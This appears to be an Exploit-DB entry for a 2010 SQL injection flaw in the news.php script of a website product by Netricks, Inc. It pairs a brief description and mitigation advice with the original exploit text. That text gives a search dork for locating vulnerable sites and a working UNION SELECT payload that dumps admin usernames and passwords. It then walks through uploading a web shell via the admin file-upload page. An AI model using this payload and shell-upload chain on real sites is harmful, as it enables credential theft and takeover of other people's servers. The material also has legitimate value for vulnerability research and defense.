Website Design and Hosting By Netricks, Inc (news.php) SQL Injection Vulnerability

vendor:

Website Design and Hosting

by:

Dr.SiLnT HilL

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Website Design and Hosting

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Website Design and Hosting By Netricks, Inc (news.php) SQL Injection Vulnerability

A SQL injection vulnerability exists in Website Design and Hosting By Netricks, Inc. The vulnerability is due to improper sanitization of user-supplied input in the 'news.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with malicious SQL statements to the vulnerable script. This may allow the attacker to gain access to sensitive information from the database.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL statements. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

    @@@@@@@@@  @@@@@@@@     @@@@        @@@     @@@        @@@@@@@@     @@@@@@@@@@@@
    @@@@@@@@@  @@@@@@@@    @@@@@@      @@@@@@  @@@@@@      @@@@@@@@     @@@@@@@  @@@
       @@@     @@          @@  @@     @@    @@ @@   @@     @@           @@    @@@@@@
       @@@     @@          @@  @@     @@    @@ @@   @@     @@           @@     
       @@@     @@@@@@      @@@@@@     @@    @@ @@   @@  -  @@@@@@@      @@
       @@@     @@@@@@      @@@@@@     @@    @@@@@   @@  -  @@@@@@@      @@  
       @@@     @@          @@  @@     @@            @@     @@           @@     @@@@
       @@@     @@          @@  @@     @@            @@     @@            @@      @@
       @@@     @@@@@@@@    @@  @@     @@            @@     @@@@@@@@       @@     @@ 
       @@@     @@@@@@@@    @@  @@     @@            @@     @@@@@@@@        @@@@@@@@  Dr.SiLnT HilL


===================================================================================================================================
                    Website Design and Hosting By Netricks, Inc (news.php) SQL Injection Vulnerability
===================================================================================================================================



####################################################################################################################################

# Name: Website Design and Hosting By Netricks, Inc.

# Date: 25-05-2010

# vendor: http://www.netricks.com

# Dork: intext:" Website Design and Hosting By Netricks, Inc."

# Discovered By: Dr.SiLnT HilL

# Contact : i0x0@hotmail.com

# MY Team : TeaM HacKer Egypt

###################################################################################################################################



[+] SQL Injection Vulnerability:


[+] Vulnerability: http://[site]/[path]/news.php?ax=v&n=10&id=10&nid==[SQL Injection]


[+][+] Exploit [+][+]


 http://[site]/[path]/news.php?ax=v&n=10&id=10&nid=-3+union+select+1,group_concat(username,0x3e,password),3,4,5+from+php_users--


[+][+] Admin Panel [+][+]


http://localhost/[path]/admin


[+][+] Upload your shell [+][+]


http://[site]/[path]/admin/content.php?ax=file_upload



[+][+] your shell [+][+]


http://[site]/[path]/gallery/shell.php


[+][+] Example [+][+]


###################################################################################################################################